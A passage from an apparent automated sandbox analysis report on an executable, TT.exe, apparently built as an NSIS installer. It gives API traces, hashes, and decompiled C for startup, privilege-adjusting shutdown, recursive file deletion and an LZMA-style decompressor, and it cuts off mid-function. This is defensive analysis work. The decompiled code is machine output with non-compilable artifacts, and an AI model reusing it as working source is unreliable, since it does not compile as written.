                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                                                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                                  • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                  • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                                  • Part of subcall function 00403A3B: GetUserDefaultUILanguage.KERNELBASE(00000002,747DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT.exe" ,00000000), ref: 00403A55
                                                  • Part of subcall function 00403A3B: lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,747DFA90), ref: 00403B2B
                                                  • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                  • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                                  • Part of subcall function 00403A3B: LoadImageA.USER32 ref: 00403B92
                                                  • Part of subcall function 00403A3B: RegisterClassA.USER32 ref: 00403BCF
                                                  • Part of subcall function 00403949: CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                                  • Part of subcall function 00403949: CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403780
                                                • ExitProcess.KERNEL32 ref: 004037A1
                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                                                • ExitProcess.KERNEL32 ref: 00403943
                                                  • Part of subcall function 00405944: MessageBoxIndirectA.USER32(0040A230), ref: 0040599F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                • String ID: "$"C:\Users\user\Desktop\TT.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 2181712934-173970851
                                                • Opcode ID: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                                • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                                                • Opcode Fuzzy Hash: 76ff467a8b0f681ac06bfba7839aaa220d55bfd30843e9aac785b98ea7b1fc20
                                                • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159filestringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                0x004059fa
                                                0x004059ff
                                                0x00405a08
                                                0x00405a0b
                                                0x00405a13
                                                0x00405a16
                                                0x00405a19
                                                0x00405a21
                                                0x00405a23
                                                0x00405a24
                                                0x00000000
                                                0x00405a24
                                                0x00405a2f
                                                0x00405a32
                                                0x00405a32
                                                0x00405a32
                                                0x00405a36
                                                0x00405a49
                                                0x00405a50
                                                0x00405a55
                                                0x00405a59
                                                0x00405a69
                                                0x00405a5b
                                                0x00405a61
                                                0x00405a61
                                                0x00405a6e
                                                0x00405a71
                                                0x00405a7c
                                                0x00405a82
                                                0x00405a87
                                                0x00405a97
                                                0x00405a99
                                                0x00405a9f
                                                0x00405aa2
                                                0x00405aa5
                                                0x00405b5d
                                                0x00405b5d
                                                0x00405b61
                                                0x00405b63
                                                0x00405b63
                                                0x00405b63
                                                0x00405b63
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405aab
                                                0x00405aab
                                                0x00405ab4
                                                0x00405aba
                                                0x00405abf
                                                0x00405ac2
                                                0x00405ac4
                                                0x00405ac8
                                                0x00405aca
                                                0x00405aca
                                                0x00405ac8
                                                0x00405acd
                                                0x00405ad0
                                                0x00405ae3
                                                0x00405ae5
                                                0x00405aea
                                                0x00405af1
                                                0x00405b0c
                                                0x00405b11
                                                0x00405b13
                                                0x00405b37
                                                0x00405b15
                                                0x00405b15
                                                0x00405b18
                                                0x00405b2c
                                                0x00405b1a
                                                0x00405b1d
                                                0x00405b25
                                                0x00405b25
                                                0x00405b18
                                                0x00405af3
                                                0x00405af9
                                                0x00405afb
                                                0x00405b01
                                                0x00405b01
                                                0x00405afb
                                                0x00000000
                                                0x00405af1
                                                0x00405ad2
                                                0x00405ad5
                                                0x00405ad7
                                                0x00000000
                                                0x00000000
                                                0x00405ad9
                                                0x00405adb
                                                0x00000000
                                                0x00000000
                                                0x00405add
                                                0x00405ae1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405b3c
                                                0x00405b46
                                                0x00405b4c
                                                0x00405b4c
                                                0x00405b57
                                                0x00000000
                                                0x00405b57
                                                0x00405a73
                                                0x00405a7a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405a38
                                                0x00405a38
                                                0x00405a3a
                                                0x00405b67
                                                0x00405b69
                                                0x00405b6c
                                                0x00405bbd
                                                0x00405bbd
                                                0x00405bbd
                                                0x00405b6e
                                                0x00405b71
                                                0x00405b7c
                                                0x00405b81
                                                0x00405b83
                                                0x00000000
                                                0x00000000
                                                0x00405b86
                                                0x00405b92
                                                0x00405b97
                                                0x00405b99
                                                0x00000000
                                                0x00405bb4
                                                0x00405b9b
                                                0x00405b9e
                                                0x00000000
                                                0x00000000
                                                0x00405ba3
                                                0x00000000
                                                0x00405baa
                                                0x00405b73
                                                0x00405b73
                                                0x00000000
                                                0x00405b73
                                                0x00405a40
                                                0x00405a43
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405a43

                                                APIs
                                                • DeleteFileA.KERNELBASE(?,?,747DFA90,747DF560,00000000), ref: 00405A19
                                                • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,747DFA90,747DF560,00000000), ref: 00405A61
                                                • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,747DFA90,747DF560,00000000), ref: 00405A82
                                                • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,747DFA90,747DF560,00000000), ref: 00405A88
                                                • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,747DFA90,747DF560,00000000), ref: 00405A99
                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                                                • FindClose.KERNEL32(00000000), ref: 00405B57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\TT.exe" $\*.*
                                                • API String ID: 2035342205-210273560
                                                • Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                                • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                                                • Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                                • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
